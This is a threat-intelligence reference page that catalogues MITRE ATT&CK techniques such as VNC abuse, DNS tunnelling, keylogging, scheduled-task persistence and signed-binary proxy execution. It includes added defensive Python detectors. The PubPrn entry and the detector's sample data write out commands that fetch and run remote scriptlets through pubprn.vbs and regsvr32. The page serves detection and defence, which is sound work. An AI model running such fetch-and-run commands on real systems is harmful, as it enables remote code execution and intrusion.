Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)

The tag is: misp-galaxy:mitre-attack-pattern="VNC - T1021.005"

Table 6346. Table References

Links

http://lists.openstack.org/pipermail/openstack/2013-December/004138.html

https://attack.mitre.org/techniques/T1021/005

https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in

https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication

https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc

https://pentestlab.blog/2012/10/30/attacking-vnc-servers/

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac

https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/

https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/

https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication

Steganography - T1406.001

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1406.001"

Table 6347. Table References

Links

https://attack.mitre.org/techniques/T1406/001

DNS - T1071.004

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
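Detection logic for the tunneling pattern described above, as an added example that is not part of the MISP galaxy or ATT&CK: it scores each query on three signals (a long leftmost label, a high-entropy label, many distinct subdomains under one parent) and reports a parent domain only when at least two fire. The log format and the lines in SAMPLE_LOG are constructed for this demonstration.

```python
"""Heuristic triage of DNS query logs for tunnelling-style traffic.

Added example, not from the MISP galaxy or ATT&CK. A parent domain is
reported only when at least two signals fire, so an ordinary domain with a
handful of normal hosts is not flagged on the subdomain count alone."""

import math
import re
from collections import Counter, defaultdict

# Constructed format: "<epoch> <client-ip> <query-name> <qtype>"
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000001 10.0.0.5 mail.example.com MX
1700000002 10.0.0.7 3q2x9zkd0vj4p7yl6w1r8t5n.c2-example.net TXT
1700000003 10.0.0.7 9fgk2m8z1x6c4v7b3n0p5h2j.c2-example.net TXT
1700000004 10.0.0.7 x7z1q4w8e2r5t9y0u3i6o1p4.c2-example.net TXT
1700000005 10.0.0.9 cdn.example.com A
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_log(text):
    """Yield a dict per well-formed line; malformed lines are skipped."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            ts, client, qname, qtype = m.groups()
            yield {"ts": int(ts), "client": client,
                   "qname": qname.rstrip(".").lower(), "qtype": qtype}


def shannon_entropy(s):
    """Bits of entropy per character; encoded or compressed payloads score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname):
    """Split into (subdomain, parent), treating the last two labels as the parent.
    Simplification: names like example.co.uk would need a public-suffix list."""
    labels = qname.split(".")
    if len(labels) <= 2:
        return "", qname
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def analyze(log_text, max_label=20, min_entropy=3.5, min_unique_subs=3):
    """Return {parent: {"reasons": [...], "clients": [...], "queries": n}}
    for every parent domain where at least two signals fire."""
    stats = defaultdict(lambda: {"subs": set(), "clients": set(),
                                 "reasons": set(), "queries": 0})
    for rec in parse_log(log_text):
        sub, parent = split_name(rec["qname"])
        st = stats[parent]
        st["clients"].add(rec["client"])
        st["queries"] += 1
        if not sub:
            continue
        st["subs"].add(sub)
        leftmost = sub.split(".")[0]      # tunnels usually carry payload here
        if len(leftmost) > max_label:
            st["reasons"].add("long-label")
        if shannon_entropy(leftmost) > min_entropy:
            st["reasons"].add("high-entropy")
    report = {}
    for parent, st in stats.items():
        if len(st["subs"]) >= min_unique_subs:
            st["reasons"].add("many-subdomains")
        if len(st["reasons"]) >= 2:
            report[parent] = {"reasons": sorted(st["reasons"]),
                              "clients": sorted(st["clients"]),
                              "queries": st["queries"]}
    return report


if __name__ == "__main__":
    for parent, info in analyze(SAMPLE_LOG).items():
        print(parent, info)
```

Thresholds are starting points; tune them against a baseline of your own resolver logs before alerting on them.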

The tag is: misp-galaxy:mitre-attack-pattern="DNS - T1071.004"

Table 6348. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/004

https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000

https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling

Keylogging - T1056.001

Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:

  • Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.

  • Reading raw keystroke data from the hardware buffer.

  • Windows Registry modifications.

  • Custom drivers.

  • [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"

Table 6349. Table References

Links

http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

https://attack.mitre.org/techniques/T1056/001

https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

PowerShell - T1059.001

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell’s underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"

Table 6350. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

https://attack.mitre.org/techniques/T1059/001

https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/

https://github.com/jaredhaight/PSAttack

https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx

https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367

https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

At - T1053.002

Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running and that the user be logged on as a member of the local Administrators group.

On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
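The at.allow / at.deny decision above written out as code, as an added example that is not from the MISP galaxy or from the at utility itself, so each branch (including the empty at.deny case) can be checked; the default paths /etc/at.allow and /etc/at.deny are the usual Linux locations and are an assumption not stated above, and the sample accounts are constructed.

```python
"""Who may invoke at(1) under a given at.allow / at.deny state.

Added example, not from the MISP galaxy or the at utility. The two files
are modelled as optional sets so that "missing" and "present but empty"
stay distinct, which is exactly the distinction the rules hinge on."""

from dataclasses import dataclass
from typing import Iterable, List, Optional, Set


@dataclass(frozen=True)
class AtPolicy:
    """Snapshot of the two control files.

    None  -> the file does not exist
    set() -> the file exists but lists nobody
    """
    allow: Optional[Set[str]]
    deny: Optional[Set[str]]


def at_permitted(user: str, policy: AtPolicy, superuser: str = "root") -> bool:
    """Apply the rules in precedence order:
    1. the superuser is always permitted;
    2. if at.allow exists, only the users listed in it are permitted
       (at.deny is not consulted at all);
    3. otherwise, if at.deny exists, everyone NOT listed in it is permitted,
       so an empty at.deny opens at(1) to every account;
    4. if neither file exists, only the superuser is permitted."""
    if user == superuser:
        return True
    if policy.allow is not None:
        return user in policy.allow
    if policy.deny is not None:
        return user not in policy.deny
    return False


def load_policy(allow_path: str = "/etc/at.allow",
                deny_path: str = "/etc/at.deny") -> AtPolicy:
    """Read the live files (assumed default Linux paths); a missing file
    becomes None, a present file becomes the set of non-blank usernames."""
    def read(path: str) -> Optional[Set[str]]:
        try:
            with open(path, encoding="utf-8") as fh:
                return {line.strip() for line in fh if line.strip()}
        except FileNotFoundError:
            return None
    return AtPolicy(read(allow_path), read(deny_path))


def audit_users(users: Iterable[str], policy: AtPolicy,
                superuser: str = "root") -> List[str]:
    """Sorted list of accounts able to schedule at jobs under `policy`.
    A surprisingly long list usually means at.deny exists but is empty."""
    return sorted(u for u in users if at_permitted(u, policy, superuser))


if __name__ == "__main__":
    accounts = ["root", "alice", "bob", "svc-backup"]          # constructed
    print("neither file:  ", audit_users(accounts, AtPolicy(None, None)))
    print("empty at.deny: ", audit_users(accounts, AtPolicy(None, set())))
    print("deny bob only: ", audit_users(accounts, AtPolicy(None, {"bob"})))
    print("allow alice:   ", audit_users(accounts, AtPolicy({"alice"}, {"alice"})))
```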

Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).

In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via <code>sudo</code>.(Citation: GTFObins at)

The tag is: misp-galaxy:mitre-attack-pattern="At - T1053.002"

Table 6351. Table References

Links

https://attack.mitre.org/techniques/T1053/002

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events

https://gtfobins.github.io/gtfobins/at/

https://man7.org/linux/man-pages/man1/at.1p.html

https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/dd315590.aspx

https://twitter.com/leoloobeek/status/939248813465853953

https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/

Steganography - T1027.003

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim’s system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu)

By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim’s system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim’s machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003"

Table 6352. Table References

Links

https://attack.mitre.org/techniques/T1027/003

https://en.wikipedia.org/wiki/Duqu

https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

AppleScript - T1059.002

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.(Citation: SentinelOne AppleScript)

AppleScripts do not need to call <code>osascript</code> to execute; they may instead be executed from within Mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s <code>NSAppleScript</code> or <code>OSAScript</code>, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)

The tag is: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002"

Table 6353. Table References

Links

https://attack.mitre.org/techniques/T1059/002

https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/

https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/

DNS - T1590.002

Adversaries may gather information about the victim’s DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="DNS - T1590.002"

Table 6354. Table References

Links

https://attack.mitre.org/techniques/T1590/002

https://dnsdumpster.com/

https://twitter.com/PyroTek3/status/1126487227712921600/photo/1

https://www.circl.lu/services/passive-dns/

Cron - T1053.003

Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code>crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.

An adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003).

The tag is: misp-galaxy:mitre-attack-pattern="Cron - T1053.003"

Table 6355. Table References

Links

https://attack.mitre.org/techniques/T1053/003

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

Launchd - T1053.004

This technique is deprecated due to inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself.

Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for initial or recurring execution of malicious code. The <code>launchd</code> daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

An adversary may use the <code>launchd</code> daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. <code>launchd</code> can also be abused to run a process under the context of a specified account. Daemons, such as <code>launchd</code>, run with the permissions of the root user account, and will operate regardless of which user account is logged in.

The tag is: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004"

Table 6356. Table References

Links

https://attack.mitre.org/techniques/T1053/004

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Python - T1059.006

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

The tag is: misp-galaxy:mitre-attack-pattern="Python - T1059.006"

Table 6357. Table References

Links

https://attack.mitre.org/techniques/T1059/006

JavaScript - T1059.007

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

The tag is: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007"

Table 6358. Table References

Links

https://attack.mitre.org/techniques/T1059/007

https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html

https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript

https://docs.microsoft.com/scripting/winscript/windows-script-interfaces

https://docs.microsoft.com/windows/win32/com/translating-to-jscript

https://nodejs.org/

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

https://redcanary.com/blog/clipping-silver-sparrows-wings/

https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/

https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/

Regsvr32 - T1218.010

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to a file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010"

Table 6359. Table References

Links

https://attack.mitre.org/techniques/T1218/010

https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

https://support.microsoft.com/en-us/kb/249873

https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/

https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

Confluence - T1213.001

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation; however, it may in general contain more diverse categories of useful information, such as:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001"

Table 6360. Table References

Links

https://attack.mitre.org/techniques/T1213/001

https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

PubPrn - T1216.001

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
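Command-line triage for the PubPrn pattern above and the Regsvr32 remote-URL pattern described earlier on this page, as an added example that is not from the MISP galaxy or ATT&CK: a pubprn invocation whose second argument carries the <code>script:</code> moniker instead of an <code>LDAP://</code> path, or a regsvr32 invocation that receives a URL, is reported. The sample command lines are constructed for this demonstration (the Printing_Admin_Scripts path is where Windows ships pubprn.vbs; the regsvr32 line only needs its URL argument to matter).

```python
"""Classify process-creation command lines for PubPrn / Regsvr32 abuse.

Added example, not from the MISP galaxy or ATT&CK. Tokenising is a plain
whitespace split with surrounding quotes dropped; paths containing spaces
would need a real Windows argv parser."""

import re
from typing import Iterable, List, Tuple

PUBPRN_RE = re.compile(r"(?:^|[\\/])pubprn(?:\.vbs)?$", re.IGNORECASE)
REGSVR32_RE = re.compile(r"(?:^|[\\/])regsvr32(?:\.exe)?$", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample lines; the first two are the invocations quoted in the text.
SAMPLE_CMDLINES = [
    "cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com",
    'cscript.exe //nologo "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs" '
    "127.0.0.1 script:https://mydomain.com/folder/file.sct",
    "regsvr32.exe https://example.invalid/file.sct",
    "cscript.exe C:\\scripts\\inventory.vbs",
    "regsvr32.exe C:\\vendor\\plugin.dll",
]

FLAGGED = {"remote-scriptlet", "remote-url", "unexpected", "malformed"}


def _tokens(cmdline: str) -> List[str]:
    return [t.strip('"') for t in cmdline.split()]


def classify_pubprn(cmdline: str) -> str:
    """pubprn expects <server> <LDAP path>; anything else in the second slot
    is worth a look, and the script: moniker is the T1216.001 pattern."""
    tokens = _tokens(cmdline)
    idx = next((i for i, t in enumerate(tokens) if PUBPRN_RE.search(t)), None)
    if idx is None:
        return "not-pubprn"
    # cscript/wscript host switches look like //nologo; they are not script args.
    args = [t for t in tokens[idx + 1:] if not t.startswith("//")]
    if len(args) < 2:
        return "malformed"
    target = args[1].lower()
    if target.startswith("ldap://"):
        return "expected-ldap"
    if target.startswith("script:"):
        return "remote-scriptlet"
    return "unexpected"


def classify_regsvr32(cmdline: str) -> str:
    """A URL handed to regsvr32 means the scriptlet is fetched from a web server."""
    tokens = _tokens(cmdline)
    if not any(REGSVR32_RE.search(t) for t in tokens):
        return "not-regsvr32"
    if any(URL_RE.search(t) for t in tokens):
        return "remote-url"
    return "local"


def triage(cmdlines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (cmdline, verdict) for every line that deserves analyst attention."""
    out = []
    for line in cmdlines:
        for verdict in (classify_pubprn(line), classify_regsvr32(line)):
            if verdict in FLAGGED:
                out.append((line, verdict))
                break
    return out


if __name__ == "__main__":
    for line, verdict in triage(SAMPLE_CMDLINES):
        print(f"{verdict:17} {line}")
```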

The tag is: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001"

Table 6361. Table References

Links

https://attack.mitre.org/techniques/T1216/001

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn

https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

MSBuild - T1127.001

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)

The tag is: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001"

Table 6362. Table References

Links

https://attack.mitre.org/techniques/T1127/001

https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element

